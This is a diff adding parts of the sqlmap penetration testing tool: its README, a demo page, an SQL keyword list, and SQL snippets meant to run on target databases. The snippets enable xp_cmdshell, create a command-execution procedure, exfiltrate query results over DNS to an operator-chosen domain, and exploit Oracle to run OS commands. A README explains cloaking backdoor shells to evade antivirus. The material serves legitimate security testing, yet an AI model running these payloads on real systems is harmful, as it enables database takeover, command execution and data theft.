+++ b/README.md
@@ -0,0 +1,72 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
+
+**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/scan-website-security-issues/?utm_source=sqlmap.org&utm_medium=banner&utm_campaign=github).**
+
+Screenshots
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
+
+Installation
+----
+
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking  [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.
+
+Usage
+----
+
+To get a list of basic options and switches use:
+
+    python sqlmap.py -h
+
+To get a list of all options and switches use:
+
+    python sqlmap.py -hh
+
+You can find a sample run [here](https://asciinema.org/a/46601).
+To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Links
+----
+
+* Homepage: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
+* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+Translations
+----
+
+* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
+* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
+* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
+* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
+* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
+* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
+* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
+* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
--- a/data/html/index.html
+++ b/data/html/index.html
@@ -0,0 +1,150 @@
+<!DOCTYPE html>
+
+<!-- http://angrytools.com/bootstrap/editor/ -->
+
+<html lang="en">
+<head>
+    <meta charset="utf-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1">
+    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
+    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap-theme.min.css" rel="stylesheet">
+    
+    <!--[if lt IE 9]><script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script><script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
+</head>
+<body>
+    <style>
+  #wrapper { width: 100%; }
+
+  #page-wrapper {
+    padding: 0 15px;
+    min-height: 568px;
+    background-color: #fff;
+  }
+
+  @media(min-width:768px) {
+    #page-wrapper {
+      position: inherit;
+      margin: 0 0 0 250px;
+      padding: 0 30px;
+      border-left: 1px solid #e7e7e7;
+    }
+  } 
+
+  .sidebar .sidebar-nav.navbar-collapse { padding-right: 0; padding-left: 0; }
+  .sidebar .sidebar-search { padding: 15px; }
+  .sidebar ul li { border-bottom: 1px solid #e7e7e7; }
+
+  .sidebar ul li a.active { background-color: #eee; }
+
+  .sidebar .arrow { float: right;}
+  .sidebar .fa.arrow:before { content: "f104";}
+  .sidebar .active>a>.fa.arrow:before { content: "f107"; }
+  .sidebar .nav-second-level li,
+  .sidebar .nav-third-level li {
+    border-bottom: 0!important;
+  }
+
+  .sidebar .nav-second-level li a { padding-left: 37px; }
+  .sidebar .nav-third-level li a { padding-left: 52px; }
+
+  @media(min-width:768px) {
+    .sidebar {
+      z-index: 1;
+      position: absolute;
+      width: 250px;
+      margin-top: 51px;
+    }   
+  } 
+</style>
+<div id="wrapper">
+
+  <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0">
+    <div class="navbar-header">
+      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
+        <span class="sr-only">Toggle navigation</span>
+        <span class="icon-bar"></span>
+        <span class="icon-bar"></span>
+        <span class="icon-bar"></span>
+      </button>
+      <a class="navbar-brand" href="index.html">sqlmap</a>
+    </div>
+
+    <div class="navbar-default sidebar" role="navigation">
+      <div class="sidebar-nav navbar-collapse">
+        <ul class="nav" id="side-menu">                        
+          <li>
+            <a href="#"><i class="glyphicon glyphicon-home"></i> Options<span class="arrow"></span></a>
+            <ul class="nav nav-second-level">
+              <li><a>Target</a></li>
+              <li><a>Request</a></li>
+              <li><a>Optimization</a></li>
+              <li><a>Injection</a></li>
+              <li><a>Detection</a></li>
+              <li><a>Techniques</a></li>
+              <li><a>Fingerprint</a></li>
+              <li><a>Enumeration</a></li>
+              <li><a>Brute force</a></li>
+              <li><a>User-defined function injection</a></li>
+              <li><a>File system access</a></li>
+              <li><a>Operating system access</a></li>
+              <li><a>Windows registry access</a></li>
+              <li><a>General</a></li>
+              <li><a>Miscellaneous</a></li>
+            </ul> 
+          </li> 
+        </ul>
+      </div>
+    </div>             
+  </nav>
+
+  <div id="page-wrapper"> 
+    <div class="row">
+      <h4>DEMO</h4>
+    </div> 
+  </div>
+</div>
+<script>
+  /*
+ * metismenu - v1.0.3
+ * Easy menu jQuery plugin for Twitter Bootstrap 3
+ * https://github.com/onokumus/metisMenu
+ *
+ * Made by Osman Nuri Okumuş
+ * Under MIT License
+*/
+  !function(a,b,c){function d(b,c){this.element=b,this.settings=a.extend({},f,c),this._defaults=f,this._name=e,this.init()}var e="metisMenu",f={toggle:!0};d.prototype={init:function(){var b=a(this.element),c=this.settings.toggle;this.isIE()<=9?(b.find("li.active").has("ul").children("ul").collapse("show"),b.find("li").not(".active").has("ul").children("ul").collapse("hide")):(b.find("li.active").has("ul").children("ul").addClass("collapse in"),b.find("li").not(".active").has("ul").children("ul").addClass("collapse")),b.find("li").has("ul").children("a").on("click",function(b){b.preventDefault(),a(this).parent("li").toggleClass("active").children("ul").collapse("toggle"),c&&a(this).parent("li").siblings().removeClass("active").children("ul.in").collapse("hide")})},isIE:function(){for(var a,b=3,d=c.createElement("div"),e=d.getElementsByTagName("i");d.innerHTML="<!--[if gt IE "+ ++b+"]><i></i><![endif]-->",e[0];)return b>4?b:a}},a.fn[e]=function(b){return this.each(function(){a.data(this,"plugin_"+e)||a.data(this,"plugin_"+e,new d(this,b))})}}(jQuery,window,document);
+
+  $(function() {
+
+    $('#side-menu').metisMenu();
+
+  });
+
+  //Loads the correct sidebar on window load,
+  //collapses the sidebar on window resize.
+  // Sets the min-height of #page-wrapper to window size
+  $(function() {
+    $(window).bind("load resize", function() {
+      topOffset = 50;
+      width = (this.window.innerWidth > 0) ? this.window.innerWidth : this.screen.width;
+      if (width < 768) {
+        $('div.navbar-collapse').addClass('collapse')
+        topOffset = 100; // 2-row-menu
+      } else {
+        $('div.navbar-collapse').removeClass('collapse')
+      }
+
+      height = (this.window.innerHeight > 0) ? this.window.innerHeight : this.screen.height;
+      height = height - topOffset;
+      if (height < 1) height = 1;
+      if (height > topOffset) {
+        $("#page-wrapper").css("min-height", (height) + "px");
+      }
+    })
+  });
+</script>
+    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
+    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
+</body>
+</html>
--- a/data/procs/README.txt
+++ b/data/procs/README.txt
@@ -0,0 +1,4 @@
+Files in this folder represent SQL snippets used by sqlmap on the target
+system.
+They are licensed under the terms of the GNU Lesser General Public License
+where not specified otherwise.
--- a/data/procs/mssqlserver/activate_sp_oacreate.sql
+++ b/data/procs/mssqlserver/activate_sp_oacreate.sql
@@ -0,0 +1,4 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'ole automation procedures',1;
+RECONFIGURE WITH OVERRIDE
--- a/data/procs/mssqlserver/configure_openrowset.sql
+++ b/data/procs/mssqlserver/configure_openrowset.sql
@@ -0,0 +1,6 @@
+EXEC master..sp_configure 'show advanced options', 1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
+RECONFIGURE WITH OVERRIDE;
+EXEC sp_configure 'show advanced options', 0;
+RECONFIGURE WITH OVERRIDE
--- a/data/procs/mssqlserver/configure_xp_cmdshell.sql
+++ b/data/procs/mssqlserver/configure_xp_cmdshell.sql
@@ -0,0 +1,6 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'show advanced options',0;
+RECONFIGURE WITH OVERRIDE
--- a/data/procs/mssqlserver/create_new_xp_cmdshell.sql
+++ b/data/procs/mssqlserver/create_new_xp_cmdshell.sql
@@ -0,0 +1,3 @@
+DECLARE @%RANDSTR% nvarchar(999);
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+EXEC master..sp_executesql @%RANDSTR%
--- a/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
+++ b/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
@@ -0,0 +1 @@
+EXEC master..sp_dropextendedproc 'xp_cmdshell'
--- a/data/procs/mssqlserver/dns_request.sql
+++ b/data/procs/mssqlserver/dns_request.sql
@@ -0,0 +1,4 @@
+DECLARE @host varchar(1024);
+SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
+EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
+# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
--- a/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
+++ b/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
@@ -0,0 +1 @@
+EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'
--- a/data/procs/mssqlserver/run_statement_as_user.sql
+++ b/data/procs/mssqlserver/run_statement_as_user.sql
@@ -0,0 +1,3 @@
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
--- a/data/procs/mysql/dns_request.sql
+++ b/data/procs/mysql/dns_request.sql
@@ -0,0 +1 @@
+SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%'))
--- a/data/procs/mysql/write_file_limit.sql
+++ b/data/procs/mysql/write_file_limit.sql
@@ -0,0 +1 @@
+LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -0,0 +1,2 @@
+SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
--- a/data/procs/oracle/read_file_export_extension.sql
+++ b/data/procs/oracle/read_file_export_extension.sql
@@ -0,0 +1,4 @@
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
--- a/data/procs/postgresql/dns_request.sql
+++ b/data/procs/postgresql/dns_request.sql
@@ -0,0 +1,14 @@
+DROP TABLE IF EXISTS %RANDSTR1%;
+# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required
+CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
+CREATE OR REPLACE FUNCTION %RANDSTR3%()
+RETURNS VOID AS $$
+DECLARE %RANDSTR4% TEXT;
+DECLARE %RANDSTR5% TEXT;
+BEGIN
+SELECT INTO %RANDSTR5% (%QUERY%);
+%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
+EXECUTE %RANDSTR4%;
+END;
+$$ LANGUAGE plpgsql SECURITY DEFINER;
+SELECT %RANDSTR3%();
--- a/data/shell/README.txt
+++ b/data/shell/README.txt
@@ -0,0 +1,7 @@
+Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../extra/cloak/cloak.py utility.
+
+To prepare the original scripts to the cloaked form use this command:
+find backdoors/backdoor.* stagers/stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \;
+
+To get back them into the original form use this:
+find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \;
--- a/data/shell/backdoors/backdoor.asp_
+++ b/data/shell/backdoors/backdoor.asp_
--- a/data/shell/backdoors/backdoor.aspx_
+++ b/data/shell/backdoors/backdoor.aspx_
--- a/data/shell/backdoors/backdoor.jsp_
+++ b/data/shell/backdoors/backdoor.jsp_
--- a/data/shell/backdoors/backdoor.php_
+++ b/data/shell/backdoors/backdoor.php_
--- a/data/shell/stagers/stager.asp_
+++ b/data/shell/stagers/stager.asp_
--- a/data/shell/stagers/stager.aspx_
+++ b/data/shell/stagers/stager.aspx_
--- a/data/shell/stagers/stager.jsp_
+++ b/data/shell/stagers/stager.jsp_
--- a/data/shell/stagers/stager.php_
+++ b/data/shell/stagers/stager.php_
--- a/data/txt/common-columns.txt
+++ b/data/txt/common-columns.txt
--- a/data/txt/common-files.txt
+++ b/data/txt/common-files.txt
--- a/data/txt/common-outputs.txt
+++ b/data/txt/common-outputs.txt
--- a/data/txt/common-tables.txt
+++ b/data/txt/common-tables.txt
--- a/data/txt/keywords.txt
+++ b/data/txt/keywords.txt
@@ -0,0 +1,452 @@
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+# See the file 'LICENSE' for copying permission
+
+# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
+
+ABSOLUTE
+ACTION
+ADD
+ALL
+ALLOCATE
+ALTER
+AND
+ANY
+ARE
+AS
+ASC
+ASSERTION
+AT
+AUTHORIZATION
+AVG
+BEGIN
+BETWEEN
+BIT
+BIT_LENGTH
+BOTH
+BY
+CALL
+CASCADE
+CASCADED
+CASE
+CAST
+CATALOG
+CHAR
+CHAR_LENGTH
+CHARACTER
+CHARACTER_LENGTH
+CHECK
+CLOSE
+COALESCE
+COLLATE
+COLLATION
+COLUMN
+COMMIT
+CONDITION
+CONNECT
+CONNECTION
+CONSTRAINT
+CONSTRAINTS
+CONTAINS
+CONTINUE
+CONVERT
+CORRESPONDING
+COUNT
+CREATE
+CROSS
+CURRENT
+CURRENT_DATE
+CURRENT_PATH
+CURRENT_TIME
+CURRENT_TIMESTAMP
+CURRENT_USER
+CURSOR
+DATE
+DAY
+DEALLOCATE
+DEC
+DECIMAL
+DECLARE
+DEFAULT
+DEFERRABLE
+DEFERRED
+DELETE
+DESC
+DESCRIBE
+DESCRIPTOR
+DETERMINISTIC
+DIAGNOSTICS
+DISCONNECT
+DISTINCT
+DO
+DOMAIN
+DOUBLE
+DROP
+ELSE
+ELSEIF
+END
+ESCAPE
+EXCEPT
+EXCEPTION
+EXEC
+EXECUTE
+EXISTS
+EXIT
+EXTERNAL
+EXTRACT
+FALSE
+FETCH
+FIRST
+FLOAT
+FOR
+FOREIGN
+FOUND
+FROM
+FULL
+FUNCTION
+GET
+GLOBAL
+GO
+GOTO
+GRANT
+GROUP
+HANDLER
+HAVING
+HOUR
+IDENTITY
+IF
+IMMEDIATE
+IN
+INDICATOR
+INITIALLY
+INNER
+INOUT
+INPUT
+INSENSITIVE
+INSERT
+INT
+INTEGER
+INTERSECT
+INTERVAL
+INTO
+IS
+ISOLATION
+JOIN
+KEY
+LANGUAGE
+LAST
+LEADING
+LEAVE
+LEFT
+LEVEL
+LIKE
+LOCAL
+LOOP
+LOWER
+MATCH
+MAX
+MIN
+MINUTE
+MODULE
+MONTH
+NAMES
+NATIONAL
+NATURAL
+NCHAR
+NEXT
+NO
+NOT
+NULL
+NULLIF
+NUMERIC
+OCTET_LENGTH
+OF
+ON
+ONLY
+OPEN
+OPTION
+OR
+ORDER
+OUT
+OUTER
+OUTPUT
+OVERLAPS
+PAD
+PARAMETER
+PARTIAL
+PATH
+POSITION
+PRECISION
+PREPARE
+PRESERVE
+PRIMARY
+PRIOR
+PRIVILEGES
+PROCEDURE
+READ
+REAL
+REFERENCES
+RELATIVE
+REPEAT
+RESIGNAL
+RESTRICT
+RETURN
+RETURNS
+REVOKE
+RIGHT
+ROLLBACK
+ROUTINE
+ROWS
+SCHEMA
+SCROLL
+SECOND
+SECTION
+SELECT
+SESSION
+SESSION_USER
+SET
+SIGNAL
+SIZE
+SMALLINT
+SOME
+SPACE
+SPECIFIC
+SQL
+SQLCODE
+SQLERROR
+SQLEXCEPTION
+SQLSTATE
+SQLWARNING
+SUBSTRING
+SUM
+SYSTEM_USER
+TABLE
+TEMPORARY
+THEN
+TIME
+TIMESTAMP
+TIMEZONE_HOUR
+TIMEZONE_MINUTE
+TO
+TRAILING
+TRANSACTION
+TRANSLATE
+TRANSLATION
+TRIM
+TRUE
+UNDO
+UNION
+UNIQUE
+UNKNOWN
+UNTIL
+UPDATE
+UPPER
+USAGE
+USER
+USING
+VALUE
+VALUES
+VARCHAR
+VARYING
+VIEW
+WHEN
+WHENEVER
+WHERE
+WHILE
+WITH
+WORK
+WRITE
+YEAR
+ZONE
+
+# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html)
+ADD
+ALL
+ALTER
+ANALYZE
+AND
+ASASC
+ASENSITIVE
+BEFORE
+BETWEEN
+BIGINT
+BINARYBLOB
+BOTH
+BY
+CALL
+CASCADE
+CASECHANGE
+CAST
+CHAR
+CHARACTER
+CHECK
+COLLATE
+COLUMN
+CONCAT
+CONDITIONCONSTRAINT
+CONTINUE
+CONVERT
+CREATE
+CROSS
+CURRENT_DATE
+CURRENT_TIMECURRENT_TIMESTAMP
+CURRENT_USER
+CURSOR
+DATABASE
+DATABASES
+DAY_HOUR
+DAY_MICROSECONDDAY_MINUTE
+DAY_SECOND
+DEC
+DECIMAL
+DECLARE
+DEFAULTDELAYED
+DELETE
+DESC
+DESCRIBE
+DETERMINISTIC
+DISTINCTDISTINCTROW
+DIV
+DOUBLE
+DROP
+DUAL
+EACH
+ELSEELSEIF
+ENCLOSED
+ESCAPED
+EXISTS
+EXIT
+EXPLAIN
+FALSEFETCH
+FLOAT
+FLOAT4
+FLOAT8
+FOR
+FORCE
+FOREIGNFROM
+FULLTEXT
+GRANT
+GROUP
+HAVING
+HIGH_PRIORITYHOUR_MICROSECOND
+HOUR_MINUTE
+HOUR_SECOND
+IF
+IFNULL
+IGNORE
+ININDEX
+INFILE
+INNER
+INOUT
+INSENSITIVE
+INSERT
+INTINT1
+INT2
+INT3
+INT4
+INT8
+INTEGER
+INTERVALINTO
+IS
+ISNULL
+ITERATE
+JOIN
+KEY
+KEYS
+KILLLEADING
+LEAVE
+LEFT
+LIKE
+LIMIT
+LINESLOAD
+LOCALTIME
+LOCALTIMESTAMP
+LOCK
+LONG
+LONGBLOBLONGTEXT
+LOOP
+LOW_PRIORITY
+MATCH
+MEDIUMBLOB
+MEDIUMINT
+MEDIUMTEXTMIDDLEINT
+MINUTE_MICROSECOND
+MINUTE_SECOND
+MOD
+MODIFIES
+NATURAL
+NOTNO_WRITE_TO_BINLOG
+NULL
+NUMERIC
+ON
+OPTIMIZE
+OPTION
+OPTIONALLYOR
+ORDER
+OUT
+OUTER
+OUTFILE
+PRECISIONPRIMARY
+PROCEDURE
+PURGE
+READ
+READS
+REALREFERENCES
+REGEXP
+RELEASE
+RENAME
+REPEAT
+REPLACE
+REQUIRERESTRICT
+RETURN
+REVOKE
+RIGHT
+RLIKE
+SCHEMA
+SCHEMASSECOND_MICROSECOND
+SELECT
+SENSITIVE
+SEPARATOR
+SET
+SHOW
+SMALLINTSONAME
+SPATIAL
+SPECIFIC
+SQL
+SQLEXCEPTION
+SQLSTATESQLWARNING
+SQL_BIG_RESULT
+SQL_CALC_FOUND_ROWS
+SQL_SMALL_RESULT
+SSL
+STARTINGSTRAIGHT_JOIN
+TABLE
+TERMINATED
+THEN
+TINYBLOB
+TINYINT
+TINYTEXTTO
+TRAILING
+TRIGGER
+TRUE
+UNDO
+UNION
+UNIQUEUNLOCK
+UNSIGNED
+UPDATE
+USAGE
+USE
+USING
+UTC_DATEUTC_TIME
+UTC_TIMESTAMP
+VALUES
+VARBINARY
+VARCHAR
+VARCHARACTERVARYING
+VERSION
+WHEN
+WHERE
+WHILE
+WITH
+WRITEXOR
+YEAR_MONTH
+ZEROFILL
--- a/data/txt/smalldict.txt
+++ b/data/txt/smalldict.txt
--- a/data/txt/user-agents.txt
+++ b/data/txt/user-agents.txt
--- a/data/txt/wordlist.tx_
+++ b/data/txt/wordlist.tx_
--- a/data/udf/README.txt
+++ b/data/udf/README.txt
@@ -0,0 +1,4 @@
+Binary files in this folder are data files used by sqlmap on the target
+system, but not executed on the system running sqlmap. They are licensed
+under the terms of the GNU Lesser General Public License and their source
+code is available on https://github.com/sqlmapproject/udfhack.
--- a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
+++ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
--- a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
+++ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
--- a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
+++ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
--- a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
+++ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
--- a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
